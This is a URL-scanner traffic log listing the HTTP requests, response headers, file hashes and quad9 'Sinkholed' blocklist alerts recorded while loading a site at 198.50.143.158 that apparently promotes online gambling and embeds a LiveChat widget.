Date: Wed, 23 Nov 2022 02:54:32 GMT
Expires: Thu, 23 Nov 2023 02:54:32 GMT
Cache-Control: public, max-age=31536000
Age: 196633
Last-Modified: Tue, 19 Apr 2022 18:51:55 GMT


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15700, version 1.0\012- data
Size:   15700
Md5:    3d7f7413fca69bff4d231ebdc50aaab0
Sha1:   cb18e7943b6a8a0e3672d7242197c19a226b92e8
Sha256: 6b4fac99c39b9ee2693d87a2508d0c7d4b4859072966616bd1f6e18c5b2f9d36
                                        
                                            GET /wp-content/uploads/2020/09/logo.png HTTP/1.1 
Host: 198.50.143.158
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://198.50.143.158/

                                         
                                         198.50.143.158
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Fri, 25 Nov 2022 09:31:43 GMT
Server: Apache
Last-Modified: Mon, 21 Sep 2020 04:23:18 GMT
Accept-Ranges: bytes
Content-Length: 27305
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image data, 254 x 76, 8-bit/color RGBA, non-interlaced\012- data
Size:   27305
Md5:    cc5f11476edb5d43d0caac56937c69f5
Sha1:   600bd048adb404fe74c87da0568f39d87d108928
Sha256: 23fdf9814b5dd3e7223c3e3eac0e9fcf81951ae0d05fa3287f89b0fe6142c560

Alerts:
  Blocklists:
    - quad9: Sinkholed
                                        
                                            GET /s/arimo/v27/P5sMzZCDf9_T_10ZxCE.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://198.50.143.158
Connection: keep-alive
Referer: http://fonts.googleapis.com/

                                         
                                         216.58.207.195
HTTP/1.1 200 OK
Content-Type: font/woff2
                                        
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 18260
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Tue, 22 Nov 2022 21:35:20 GMT
Expires: Wed, 22 Nov 2023 21:35:20 GMT
Cache-Control: public, max-age=31536000
Last-Modified: Mon, 11 Jul 2022 21:03:24 GMT
Age: 215785


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 18260, version 1.0\012- data
Size:   18260
Md5:    6dea752293556883fdae057d588b0bb1
Sha1:   e4d090e03bb920f5ddf7b09937428b2a0a2a9ee0
Sha256: 1ff84f1e03eb15dedc4668f0817372b734934076bc936e12c5c0bd3944dab0c0
                                        
                                            GET /tracking.js HTTP/1.1 
Host: cdn.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://198.50.143.158/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
last-modified: Thu, 17 Nov 2022 13:08:42 GMT
x-amz-version-id: XiT9l9I6GGKdmfwcYLWex5TUwoVUOWV5
server: AmazonS3
content-encoding: br
etag: W/"72abe41f23b1a5d3b25350cc7025a805"
vary: Accept-Encoding
x-amz-cf-pop: AMS1-C1
x-amz-cf-id: eJ1RhyZFtJ67ys9ZLXiBEM_z7MpR6nU8ruaZM1x0xArTAnZ4qZMU4Q==
content-length: 26070
cache-control: max-age=28800
expires: Fri, 25 Nov 2022 17:31:45 GMT
date: Fri, 25 Nov 2022 09:31:45 GMT
access-control-allow-origin: *
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   26070
Md5:    fdb3fbabc9d0fdd42c1230d360cd2d44
Sha1:   3968a4d120665750710b64068c0af871d1a149d5
Sha256: b774ad6e513f484794d2f3985d3b42667e11c38c6def308bcce6b3d81ebff9c7
                                        
                                            GET /wp-content/themes/frontier/images/honeycomb.png HTTP/1.1 
Host: 198.50.143.158
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://198.50.143.158/

                                         
                                         198.50.143.158
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Fri, 25 Nov 2022 09:31:44 GMT
Server: Apache
Last-Modified: Sat, 19 Sep 2020 04:53:54 GMT
Accept-Ranges: bytes
Content-Length: 265
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image data, 54 x 54, 8-bit/color RGBA, non-interlaced\012- data
Size:   265
Md5:    34eeab79cc5fbe051ee0bb4992ff518c
Sha1:   b4a9290cf5f62ea0c398f23e174d7d0458f7726e
Sha256: 5ff46b82c72bcf5b303048058fff29bbc9a760a0fd65c75682b45c43ddfab637

Alerts:
  Blocklists:
    - quad9: Sinkholed
                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: Z512X/SY7rTK8ZJcpC749A==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         54.191.210.155
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: BimyLqlvSuZmpTB9SbYEIV9kioM=

                                        
                                            GET /v3.3/customer/action/get_dynamic_configuration?license_id=1797432&url=http%3A%2F%2F198.50.143.158%2F&channel_type=code&jsonp=__w3fsfgn4fx HTTP/1.1 
Host: api.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://198.50.143.158/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
                                        
content-security-policy: frame-ancestors http://198.50.143.158/;
legacy: 2023-06-30
vary: Accept-Encoding
x-frame-options: allow-from http://198.50.143.158/
content-length: 265
date: Fri, 25 Nov 2022 09:31:45 GMT
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   265
Md5:    2ed04ef410d3f9f49fe78642abc3536c
Sha1:   55fd61dfd4f212c821e232aa0af1bf9d6742fa9a
Sha256: c44dfbd4a5579e531a23ed7484538ab43e602c6e65ca26cb10f0dc4d0c384d56
                                        
                                            GET /v3.3/customer/action/get_configuration?license_id=1797432&version=3666.7.9.280.236.38.9.11.6.5.4.8.0&group_id=0&jsonp=__lc_static_config HTTP/1.1 
Host: api.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://198.50.143.158/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
                                        
content-encoding: gzip
legacy: 2023-06-30
vary: Accept-Encoding
content-length: 1356
cache-control: public, max-age=600
expires: Fri, 25 Nov 2022 09:41:45 GMT
date: Fri, 25 Nov 2022 09:31:45 GMT
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (4030), with no line terminators
Size:   1356
Md5:    58e3f36b880e2293c81facc6c099fa40
Sha1:   b3db660ce95ba42d377116adca5f53b9ffe2693a
Sha256: 325a7ce7845a9792ab66d0d69dc79530c4acce3b7f5fd0c827e87b5b9fbce39a
                                        
                                            GET /wp-content/uploads/2020/09/agen-joker123-online-1024x517.jpg HTTP/1.1 
Host: 198.50.143.158
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://198.50.143.158/

                                         
                                         198.50.143.158
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Fri, 25 Nov 2022 09:31:44 GMT
Server: Apache
Last-Modified: Mon, 21 Sep 2020 04:35:56 GMT
Accept-Ranges: bytes
Content-Length: 142891
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 1024x517, components 3\012- data
Size:   142891
Md5:    eaffdeba2cc144c22978a98b58fa257d
Sha1:   a96d994b36f3c75c327d07ef2120452a17b32e02
Sha256: 24a83a79c0861df8efa72c7f50cecb946247cc740646dd42badb64692e4ae482

Alerts:
  Blocklists:
    - quad9: Sinkholed
                                        
                                            GET /v3.3/customer/action/get_localization?license_id=1797432&version=13159fb2ee05429e3ae48a4031b3d0e0_a4c4c32c6e02f55e3854f285a00250cd&language=id&group_id=0&jsonp=__lc_localization HTTP/1.1 
Host: api.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://198.50.143.158/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
                                        
content-encoding: gzip
legacy: 2023-06-30
vary: Accept-Encoding
cache-control: public, max-age=600
expires: Fri, 25 Nov 2022 09:41:45 GMT
date: Fri, 25 Nov 2022 09:31:45 GMT
content-length: 3996
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (11621), with no line terminators
Size:   3996
Md5:    b785eacd9cf06614a1b029e32c619c15
Sha1:   9b2d3b1192b8e96fbf32953423c2c957b5b86aac
Sha256: 4cfaa7ce20d9099434c0c36605b30935e4d4bd90023fa00b433a4e3abc292ebf
                                        
                                            GET /customer/action/open_chat?license_id=1797432&group=0&embedded=1&widget_version=3&unique_groups=0 HTTP/1.1 
Host: secure.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://198.50.143.158/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: text/html; charset=utf-8
                                        
content-encoding: gzip
vary: Accept-Encoding
date: Fri, 25 Nov 2022 09:31:45 GMT
content-length: 2558
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (8824), with no line terminators
Size:   2558
Md5:    2af834d2c1666ed80bdf535ba7baf0cf
Sha1:   f83744b1d09476acd71ce975971ace5404982232
Sha256: 1727455617bd6865da97b3dfba29fae5b9b7f43662bf5b57d9bde8f5a987dc67
                                        
                                            GET /widget/static/js/0.0f55d8dd.chunk.js HTTP/1.1 
Host: cdn.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://secure.livechatinc.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
last-modified: Thu, 10 Nov 2022 13:27:43 GMT
x-amz-version-id: FTaBdM5aPM6e3Wa0SH3EvXHWpAST4v3U
server: AmazonS3
content-encoding: br
etag: W/"10a3d7ac1ed37325d3341c379ee0de69"
vary: Accept-Encoding
x-amz-cf-pop: ARN1-C1
x-amz-cf-id: KgvNFtC8e1Ondp6OM2DSbEHtkwN5kS2GkPwb0uCzLz2iu3P1-YllZA==
content-length: 14934
cache-control: max-age=31536000
expires: Sat, 25 Nov 2023 09:31:45 GMT
date: Fri, 25 Nov 2022 09:31:45 GMT
access-control-allow-origin: *
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (47599), with no line terminators
Size:   14934
Md5:    59df903a307f8661bd53313a1a1ec2dd
Sha1:   c1b075479edfeed640cea3038d08915f5eedb9a8
Sha256: 6a19cca29c349c638cdb3a4f5103fe14562c865fc49184f33770f0f87b87bb7c
                                        
                                            GET /widget/static/js/1.1e075a8f.chunk.js HTTP/1.1 
Host: cdn.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://secure.livechatinc.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
last-modified: Thu, 10 Nov 2022 13:27:43 GMT
x-amz-version-id: o8X.laUPCA4HbBkhv_.0.rtHv1UEzu8S
server: AmazonS3
content-encoding: br
etag: W/"add645219cc09aca44e90ff2cb69482a"
vary: Accept-Encoding
x-amz-cf-pop: ARN1-C1
x-amz-cf-id: wQvKSpsPRy26in0iJkcMTYfNv8UaYE7ghU0BTCtCVHFylj64oG5eMQ==
content-length: 66502
cache-control: max-age=31536000
expires: Sat, 25 Nov 2023 09:31:45 GMT
date: Fri, 25 Nov 2022 09:31:45 GMT
access-control-allow-origin: *
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65462)
Size:   66502
Md5:    524812952e0af015a7b1f7621b66446d
Sha1:   52de20770b835fc95c42ee8fb8c929ce889f1f41
Sha256: 9c6a9bc16e05afce31697dd6ef2530653501be1ea8af90e1905d9949d014a9ba
                                        
                                            GET /widget/o-0IIpQlx3QUlC5A4PNr5TRASf6M7Q.woff2 HTTP/1.1 
Host: cdn.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://secure.livechatinc.com
Connection: keep-alive
Referer: https://secure.livechatinc.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: application/octet-stream
                                        
content-length: 12852
last-modified: Tue, 18 Oct 2022 07:22:37 GMT
etag: "3b5df7e947d77201eaf22f3dbdac08cc"
x-amz-version-id: 4jMtpmrTh3NU2il.eSSLRODO9UYgvJk9
accept-ranges: bytes
server: AmazonS3
x-amz-cf-pop: HAM50-C2
x-amz-cf-id: KM8abeyaVeSEIxlLTJcUkoNH7_q4l1PlUQolOkL0_K8Ml-Hn8lULcg==
cache-control: max-age=31536000
expires: Sat, 25 Nov 2023 09:31:45 GMT
date: Fri, 25 Nov 2022 09:31:45 GMT
access-control-allow-origin: *
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 12852, version 1.0\012- data
Size:   12852
Md5:    3b5df7e947d77201eaf22f3dbdac08cc
Sha1:   21989ca07e4afe32d48982b816b8fac85ce3e668
Sha256: 4a46d61a9aed90cea010dbabcdb510b9ceff1b729a06b169cdbe142f66cbc86f
                                        
                                            GET /widget/static/js/iframe.5a8c73ef.chunk.js HTTP/1.1 
Host: cdn.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://secure.livechatinc.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
last-modified: Thu, 17 Nov 2022 13:08:45 GMT
x-amz-version-id: P0PTNAbmnutUEWx5JwIuKC0qV1oD8pjU
server: AmazonS3
content-encoding: br
etag: W/"662ab831ab34600ffa4072f565bdfd64"
vary: Accept-Encoding
x-amz-cf-pop: AMS54-C1
x-amz-cf-id: sR-5pPSHowFYzLBZ2ofqs8DxRRrwv2J2VVm5UA7oF9d3KMAWrh3oYg==
content-length: 206714
cache-control: max-age=31536000
expires: Sat, 25 Nov 2023 09:31:45 GMT
date: Fri, 25 Nov 2022 09:31:45 GMT
access-control-allow-origin: *
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   12688
Md5:    d9f5998f47f6f22cb66e7dbf428c76ab
Sha1:   86b993baf91f867a03ea62e0d0adc9488530efaa
Sha256: e94ba9c6df7a149b4b3c590bcc484ce24ce7c0f15c6f7f43479035a6311211d6
                                        
                                            GET /wp-content/uploads/2020/09/cropped-favicon-192x192.png HTTP/1.1 
Host: 198.50.143.158
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://198.50.143.158/

                                         
                                         198.50.143.158
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Fri, 25 Nov 2022 09:31:44 GMT
Server: Apache
Last-Modified: Mon, 21 Sep 2020 04:22:23 GMT
Accept-Ranges: bytes
Content-Length: 10031
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced\012- data
Size:   10031
Md5:    efd3adf486c7a75f9982398024d4646d
Sha1:   9e7467ad8a0647583db2a4812154563f4e4291ed
Sha256: 772eec611c7ec8062c65570753e729065c208337323ba9e9180b79fe812d6e86

Alerts:
  Blocklists:
    - quad9: Sinkholed
                                        
                                            GET /wp-content/uploads/2020/09/cropped-favicon-32x32.png HTTP/1.1 
Host: 198.50.143.158
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://198.50.143.158/

                                         
                                         198.50.143.158
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Fri, 25 Nov 2022 09:31:44 GMT
Server: Apache
Last-Modified: Mon, 21 Sep 2020 04:22:23 GMT
Accept-Ranges: bytes
Content-Length: 1008
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced\012- data
Size:   1008
Md5:    2f9cb72e0f5ea576728adfe399065b73
Sha1:   28fc133c939b0aba1f07a22a449be8e9f85a4cf2
Sha256: 9805e5c560befacc92a510414399982e32edabce9f7210ea23eed9d5983d932c

Alerts:
  Blocklists:
    - quad9: Sinkholed
                                        
                                            GET /v3.3/customer/rtm/ws?license_id=1797432 HTTP/1.1 
Host: api.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: https://secure.livechatinc.com
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: /ltdxv3luWbDzFh5mqiuhg==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: same-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         23.36.79.17
HTTP/1.1 101 Switching Protocols
                                        
sec-websocket-accept: 9BJLjRW6wBY0dLWdLHDcF9bLOSE=
Access-Control-Allow-Origin: https://secure.livechatinc.com
legacy: 2023-06-30
Access-Control-Allow-Credentials: true
Date: Fri, 25 Nov 2022 09:31:46 GMT
Upgrade: websocket
Connection: Upgrade

                                        
                                            POST /customer/token HTTP/1.1 
Host: accounts.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 189
Origin: https://secure.livechatinc.com
Connection: keep-alive
Referer: https://secure.livechatinc.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: application/json
                                        
access-control-allow-credentials: true
access-control-allow-origin: https://secure.livechatinc.com
cache-control: no-cache, no-store, max-age=0, must-revalidate
expires: Fri, 01 Jan 1990 00:00:00 GMT
pragma: no-cache
content-length: 138
date: Fri, 25 Nov 2022 09:31:46 GMT
set-cookie: __lc_cid=774a0253-95c2-4593-6e5a-a494678e08b7; Path=/v2/customer/token; Domain=accounts.livechatinc.com; Expires=Mon, 25 Nov 2024 09:31:46 GMT; Max-Age=63072000; HttpOnly; Secure; SameSite=None __lc_cst=5a62399fae6dc0e33be770d21c35a6099a3e58ccaf5db957b628f11c6954e47994853f1736980f2b54b439cdc840cf7a0576be2ae158fc05ac1469e4b6cd; Path=/v2/customer/token; Domain=accounts.livechatinc.com; Expires=Mon, 25 Nov 2024 09:31:46 GMT; Max-Age=63072000; HttpOnly; Secure; SameSite=None __lc_cid=774a0253-95c2-4593-6e5a-a494678e08b7; Path=/customer/token; Domain=accounts.livechatinc.com; Expires=Mon, 25 Nov 2024 09:31:46 GMT; Max-Age=63072000; HttpOnly; Secure; SameSite=None __lc_cst=5a62399fae6dc0e33be770d21c35a6099a3e58ccaf5db957b628f11c6954e47994853f1736980f2b54b439cdc840cf7a0576be2ae158fc05ac1469e4b6cd; Path=/customer/token; Domain=accounts.livechatinc.com; Expires=Mon, 25 Nov 2024 09:31:46 GMT; Max-Age=63072000; HttpOnly; Secure; SameSite=None __oauth_redirect_detector=counter=1&t=1669368736&tag=84ed4cb5524d8cd4e49ccae2a6eacd154bc0052e; Path=/; Expires=Fri, 25 Nov 2022 09:32:16 GMT; HttpOnly; Secure; SameSite=None
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text
Size:   138
Md5:    b2521a3a388dcdb951310a9fd6d64603
Sha1:   edb6de1074d7f857d95fd7f616d761797db8b056
Sha256: 5d279f5d92474513fc5ab519c94cdd9a77b893e6367f71b4edd7b32f64c7e201
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=19214
Expires: Fri, 25 Nov 2022 14:52:00 GMT
Date: Fri, 25 Nov 2022 09:31:46 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=19214
Expires: Fri, 25 Nov 2022 14:52:00 GMT
Date: Fri, 25 Nov 2022 09:31:46 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=19214
Expires: Fri, 25 Nov 2022 14:52:00 GMT
Date: Fri, 25 Nov 2022 09:31:46 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=19214
Expires: Fri, 25 Nov 2022 14:52:00 GMT
Date: Fri, 25 Nov 2022 09:31:46 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F4dfd2143-7cf2-4a28-b8bf-bc3121d6a4d8.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 10950
x-amzn-requestid: 9bb73841-83d9-48b2-8c79-f00a57612b4a
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cFNstFeZoAMFopQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637ec31d-4e6aafd367c7740c77df133b;Sampled=0
x-amzn-remapped-date: Thu, 24 Nov 2022 01:04:30 GMT
